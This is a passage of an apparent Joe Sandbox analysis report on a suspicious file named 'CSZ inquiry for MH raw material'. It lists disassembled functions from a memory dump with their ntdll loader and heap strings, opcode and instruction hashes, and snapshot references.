                                                • Instruction ID: 71270d8013c7b424e4eac6127035e432ef8b1edbad8f95d161e0c1aff5ecf70d
                                                • Opcode Fuzzy Hash: 90cb5a36be4ff081e7078d5e14ed0a204b6c159d2876ed417752f67b763ddd25
                                                • Instruction Fuzzy Hash: 6871DFB19043469FCB22DF54C885B9B7FA8BF95764F800869F9488F286D335D588CBD1
                                                Function 0152245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • apphelp.dll, xrefs: 01522462
                                                • LdrpDynamicShimModule, xrefs: 0156A998
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0156A9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0156A992
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: e64dcd752d08de98543420b0f3bc417f95c1452920212c6300cc84bdaa487a8d
                                                • Instruction ID: 81f96493c2e03eb039f35c8be3b3c9e345ba383324afa253b3b8526e824116e2
                                                • Opcode Fuzzy Hash: e64dcd752d08de98543420b0f3bc417f95c1452920212c6300cc84bdaa487a8d
                                                • Instruction Fuzzy Hash: 40314876600202ABEB319F59D885E6E77F9FB80700F26001EE921BF295C7B05985DBC0
                                                Function 015129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 01513255
                                                • HEAP: , xrefs: 01513264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0151327D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 7d401f92d48663ba37c904908831b6a4ab38c38cf86fc42005c7f8b6ef1d7d80
                                                • Instruction ID: edb294c96f6eef3e36b9a9c62c6e333bac2c2bb1db5987482db02d1771bc6eb3
                                                • Opcode Fuzzy Hash: 7d401f92d48663ba37c904908831b6a4ab38c38cf86fc42005c7f8b6ef1d7d80
                                                • Instruction Fuzzy Hash: 3792DE71A042499FEB26CF68C450BAEBBF1FF48314F288499E859AF395D334A945CF50
                                                Function 015902C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                • API String ID: 0-1670051934
                                                • Opcode ID: 6e55f812c14050a6257be96bf35137b536dd6337eb8e7e587fa5d5be6944ac8f
                                                • Instruction ID: a278628617a2add56031c8c51e3466ef5f427bbb18a9fd3d5eaccae30552e18e
                                                • Opcode Fuzzy Hash: 6e55f812c14050a6257be96bf35137b536dd6337eb8e7e587fa5d5be6944ac8f
                                                • Instruction Fuzzy Hash: D3226E726047028FDB24CF2DC59162ABBE9BBC4310F258D2EF2DA8B690D771E544CB42
                                                Function 01510770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 9e303624b8c6e69a8ac074dd0be23776ff726394524374a36d7da3901e26b696
                                                • Instruction ID: 2ed84d5459b57e3fb9f3ee79274bc64050dc6430f302867d3cd02c35e131e3fd
                                                • Opcode Fuzzy Hash: 9e303624b8c6e69a8ac074dd0be23776ff726394524374a36d7da3901e26b696
                                                • Instruction Fuzzy Hash: 86F19A30A00606EFEB26CF68C894B6EB7F6FB84304F148569E5569F395D734E981CB90
                                                Function 01501460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 01501712
                                                • HEAP: , xrefs: 01501596
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01501728
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: a6d135d75830c4951065232413ea30dd3242580d7ce00fa07392063e4e64f558
                                                • Instruction ID: 87b4858fc3134c963e07fd975f0adf73d22bbd8e761fb7514e14129940bc97fb
                                                • Opcode Fuzzy Hash: a6d135d75830c4951065232413ea30dd3242580d7ce00fa07392063e4e64f558
                                                • Instruction Fuzzy Hash: 4BE1C430A04A459BDB26CFA8C89177ABBF1FF44304F18885EE996CF296D734E944CB51
                                                Function 01526962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 62b73e458628bdd084e231b1ac1ccb95245fe4b1cb4bd97c0789e57fff79301c
                                                • Instruction ID: ae1f86da234af2cce1c2665f9498ac430d37776b89086a058943cc169be2c49d
                                                • Opcode Fuzzy Hash: 62b73e458628bdd084e231b1ac1ccb95245fe4b1cb4bd97c0789e57fff79301c
                                                • Instruction Fuzzy Hash: 02C26F726083519FD725CF29C881BAFBBE5BF99754F04892DE9C98B281D734D804CB92
                                                Function 014FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: ee724047400dc550d7caa5067b63b1a97972084a5f6a1dfd9a7c1f2fde92b185
                                                • Instruction ID: 68ebee97d77d888fdf8b176b327e91f2257fdabb0c4190b6aaafa952ab6b687c
                                                • Opcode Fuzzy Hash: ee724047400dc550d7caa5067b63b1a97972084a5f6a1dfd9a7c1f2fde92b185
                                                • Instruction Fuzzy Hash: 53A18F359016299BDB71DF68CC98BAEB7B8FF44714F1101EAEA08AB250D7359E84CF50
                                                Function 01520BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpCheckModule, xrefs: 0156A117
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0156A121
                                                • Failed to allocated memory for shimmed module list, xrefs: 0156A10F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: f7ec5c03fd2cc7e079ab6e61a48652ca8e6fca01bf191ce81285d3060da7bfe6
                                                • Instruction ID: b72ffacc7b093ea885244bb3021682c4ad4d1e03fa15ca10c1744570abba4a83
                                                • Opcode Fuzzy Hash: f7ec5c03fd2cc7e079ab6e61a48652ca8e6fca01bf191ce81285d3060da7bfe6
                                                • Instruction Fuzzy Hash: 2F7102B1A00206DFDB25EF68C980ABEB7F4FB84304F15442DE412EF295E730A945DB90
                                                Function 01510A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: ab8709f63e2fa4489e1b33bc3204fd1a5a693dd5bbda44fb308f9e0bd389da71
                                                • Instruction ID: 1cde40f18d89a614e56d323614dbaec07166b26353f445d8a6ee717db54586cb
                                                • Opcode Fuzzy Hash: ab8709f63e2fa4489e1b33bc3204fd1a5a693dd5bbda44fb308f9e0bd389da71
                                                • Instruction Fuzzy Hash: 4B61AF71610306DFEB2ACF28C480B6ABBE5FF45704F14855EE4598F296D7B0E881CB91
                                                Function 0153C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 015782D7
                                                • minkernel\ntdll\ldrinit.c, xrefs: 015782E8
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 015782DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 455b54738e869ee4c588b83830c935f093baefbd47798be41433b87b20e10af4
                                                • Instruction ID: 36463eef7052cc429f9bd8e0f40a32d0ce111dad580a8df06805174f2c31ad41
                                                • Opcode Fuzzy Hash: 455b54738e869ee4c588b83830c935f093baefbd47798be41433b87b20e10af4
                                                • Instruction Fuzzy Hash: C241F071540302ABD722EB68D845B5F77E8BF84650F11492EF954EF2A0EB70E804CB91
                                                Function 015BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • PreferredUILanguages, xrefs: 015BC212
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015BC1C5
                                                • @, xrefs: 015BC1F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: 3b8d346764ad5c8c61c6906e4f896a998adcc25db2e1d827178c7cf8e299eb14
                                                • Instruction ID: 0b3c14413a14a755c163598a8ac915620590d7e6f908fb425730cd2fc0f905d2
                                                • Opcode Fuzzy Hash: 3b8d346764ad5c8c61c6906e4f896a998adcc25db2e1d827178c7cf8e299eb14
                                                • Instruction Fuzzy Hash: 3A418371E0021AEBEF11DBD8C891FEEFBB8BB54704F14406AE649FB250D7749A448B54
                                                Function 01594144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: 310165162ba1188b2af3bde4be83429952eace7ec2b9f6972d8a7ef1f87d0c7a
                                                • Instruction ID: e20500bf8edcc87389da3d9c0ce27b182a25c90fbfb188259526216fb8616965
                                                • Opcode Fuzzy Hash: 310165162ba1188b2af3bde4be83429952eace7ec2b9f6972d8a7ef1f87d0c7a
                                                • Instruction Fuzzy Hash: 0041F171A006598BEF22DBE8CA40BADBBF9FF95350F14049AD901AF391D7348D02CB12
                                                Function 01584755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01584888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01584899
                                                • LdrpCheckRedirection, xrefs: 0158488F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: c05586946b25dae610c1dbdc7d675d927093346f489f794b039fb611ffd22c89
                                                • Instruction ID: 64967b58a10cc7451bf808168893516251135018524fd84e0525dc3ea9145a24
                                                • Opcode Fuzzy Hash: c05586946b25dae610c1dbdc7d675d927093346f489f794b039fb611ffd22c89
                                                • Instruction Fuzzy Hash: 2641B032A246529BDB21FE58D840B2A7BE4BF89A50B06056DED58FF215E730E801CF91
                                                Function 01510BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 7eb4ed6d5b9d449c1c4d2cfd3889eb2a10330c217502d95cea09a833719d732f
                                                • Instruction ID: 721536f787f4a508e5821423f52f3516a512076b187f59a8ffdb7cef8913d681
                                                • Opcode Fuzzy Hash: 7eb4ed6d5b9d449c1c4d2cfd3889eb2a10330c217502d95cea09a833719d732f
                                                • Instruction Fuzzy Hash: 9411D2313651029FEB1ACA19C450F6EB3A8FF41656F28855EF406CF2A5EB38D885C790
                                                Function 015820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializationFailure, xrefs: 015820FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01582104
                                                • Process initialization failed with status 0x%08lx, xrefs: 015820F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 66773ad12eaa3069419e914033dff96f8f1a95de30b3eccf184fe765d25b118e
                                                • Instruction ID: 7cc6edbe085914a6f6f23f81b65b0947a3495d46503994690fa2075aa75697d8
                                                • Opcode Fuzzy Hash: 66773ad12eaa3069419e914033dff96f8f1a95de30b3eccf184fe765d25b118e
                                                • Instruction Fuzzy Hash: 63F0C275680309ABE724F64DDC47F993BACFB80B98F61005EF640BF691D6F0AA44C691
                                                Function 015103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: d9cc2b6a10b4cf58fd5eca5d43ff0883da684b048557b93b02708e95c613139b
                                                • Instruction ID: 79134fe82be317f0b296f998786fa2fcdbc5d2c8716792d887cca057bfb4dc5b
                                                • Opcode Fuzzy Hash: d9cc2b6a10b4cf58fd5eca5d43ff0883da684b048557b93b02708e95c613139b
                                                • Instruction Fuzzy Hash: 74715C71A0014A9FDB02DFA8C994BAEB7F8FF58744F144065E905EB295EA34ED41CBA0
                                                Function 015152A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: a147067b2a0c4f61e1eb6de3039b6ab2a14dae24df54fb1659ad25a00fab55cf
                                                • Instruction ID: 01f5ddde6a6305e4ab18d90c32ee754af367fbcb51d3299263643f2cc7a71a6b
                                                • Opcode Fuzzy Hash: a147067b2a0c4f61e1eb6de3039b6ab2a14dae24df54fb1659ad25a00fab55cf
                                                • Instruction Fuzzy Hash: 0B328B745183528BE7268F18C490B3EBBE5BFC6754F14491EFA858F298E774D880CB92
                                                Function 0150A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 0150AA13
                                                • LdrResSearchResource Exit, xrefs: 0150AA25
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: 52066957ae50e843f49d15101bcfc49b2b80559e4caf2c3fc4874022f3d430a5
                                                • Instruction ID: d089b9e06318a61969452adc5b38a7e8296f96bb51f43c8bb9c56fd459b54ef8
                                                • Opcode Fuzzy Hash: 52066957ae50e843f49d15101bcfc49b2b80559e4caf2c3fc4874022f3d430a5
                                                • Instruction Fuzzy Hash: 8AE14D71E00719ABEF22CED9C980BAEBBB9BF44310F144926E915EF2D1D7749941CB90
                                                Function 015CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: 1f74996afeaa34a69cfb9053a01334c187b5d907c13f7fd770a7382a11ce4646
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: 26C1BF3120434A9FEB25CE68C841B6ABFE5BFD4B18F044A2CF6968F290E774D545CB51
                                                Function 01500CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to retrieve service checksum., xrefs: 0155EE56
                                                • ResIdCount less than 2., xrefs: 0155EEC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                • API String ID: 0-863616075
                                                • Opcode ID: b0e4e3e60710690879e482917e90821237b7f21facf066ffa52a2792f5978ee6
                                                • Instruction ID: ce916ee517c77451f62aa101ea3b51818be4fa54571619867c613b946e129040
                                                • Opcode Fuzzy Hash: b0e4e3e60710690879e482917e90821237b7f21facf066ffa52a2792f5978ee6
                                                • Instruction Fuzzy Hash: A5E1F1B19087449FE365CF15C480BABBBE0FB88315F408A2EF5999B390DB709909CF56
                                                Function 0157E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 0d3fc286ff48ccee65a084c4f80523c9aacba93c50fcf3a666154409ca290f1b
                                                • Instruction ID: 6d06df4abc809b4adbe0b5974508594c19fe1c9126c4633f23c0d4262a0f4d8a
                                                • Opcode Fuzzy Hash: 0d3fc286ff48ccee65a084c4f80523c9aacba93c50fcf3a666154409ca290f1b
                                                • Instruction Fuzzy Hash: 3D615A71E003199FDB25DFA89842BAEBBF5FB48700F1444AEE649EF291D731A900CB50
                                                Function 015A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: 87223bd13577bd96b5f2a60fdce57b741ada72a06634e6b845afec6365fa546b
                                                • Instruction ID: 88e59254d9dce4b502828317ef2c560aaebcfadfbd82dd6f3970222ed7dc06df
                                                • Opcode Fuzzy Hash: 87223bd13577bd96b5f2a60fdce57b741ada72a06634e6b845afec6365fa546b
                                                • Instruction Fuzzy Hash: 16513871E4021EAFDB11DFE9CC90AEEBBB8FB48754F540529E611BB290D6709905CB60
                                                Function 015004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • kLsE, xrefs: 01500540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0150063D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: eca07eea04475990ed0e4732cca95ea5058850641c4b9fd6a154e28db6b268f0
                                                • Instruction ID: 9544b106b7a4de2913564f4d887f3e9354ea30f8fa41d3d3f203fe058c9651e4
                                                • Opcode Fuzzy Hash: eca07eea04475990ed0e4732cca95ea5058850641c4b9fd6a154e28db6b268f0
                                                • Instruction Fuzzy Hash: 3151BF715047428BD726EFA8C8407ABBBE5BF84344F10483EFAAA8B2C1E774D545CB91
                                                Function 0150A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0150A2FB
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0150A309
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 269c942cea9361a70b088a8d62048eccb63e90b7697b1915e25e14d701e75ffd
                                                • Instruction ID: 5fb2a8d536fc275ac266b05a3f71e19d7d1b53fbae993ba2ab3c017b23e60480
                                                • Opcode Fuzzy Hash: 269c942cea9361a70b088a8d62048eccb63e90b7697b1915e25e14d701e75ffd
                                                • Instruction Fuzzy Hash: 2D41AC30A04746DBEB16CF99C840BAE7BB8FF95740F1484A9E910DF2A5E7B5D940CB90
                                                Function 0153A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 1e97c6c78308009df384a1966c3cb152daabcb05ce987d82716045b88208e0fe
                                                • Instruction ID: 7689621d5b2fa4797edfa5a702b10b8dee51c40f7cca8525e4fe01bb1a60a77e
                                                • Opcode Fuzzy Hash: 1e97c6c78308009df384a1966c3cb152daabcb05ce987d82716045b88208e0fe
                                                • Instruction Fuzzy Hash: C201D1B2644700AFD311DF24CD45B1677E8F7C4715F018979A699CF190E734D814DB46
                                                Function 0150C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: b7169586b766f9673fa550ed956e9c36cf8dc46c5923d2a4dec7534a42292405
                                                • Instruction ID: e76ae5ad34209595a1040863d2272ab842bfd4fd94027bbfdd2dd2dd909a83e0
                                                • Opcode Fuzzy Hash: b7169586b766f9673fa550ed956e9c36cf8dc46c5923d2a4dec7534a42292405
                                                • Instruction Fuzzy Hash: A9824C75E002199FEB26CFE9C8807EDBBB1BF45310F1482A9E959AF391D7709981CB50
                                                Function 01552F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P`owRbow
                                                • API String ID: 0-263301770
                                                • Opcode ID: 42f3b236e6defdae532dbc319006b12c3d481aeb44d588958f65e1643cd392f7
                                                • Instruction ID: 460ba241cef18d9be6e028ec5f34a63df11023539ff8a1f92d970e5d01e9417b
                                                • Opcode Fuzzy Hash: 42f3b236e6defdae532dbc319006b12c3d481aeb44d588958f65e1643cd392f7
                                                • Instruction Fuzzy Hash: 6B42D471D0425AAEEFE9CBACD4646BDBFB1BF04394F14801BED49AF291D6348A81C750
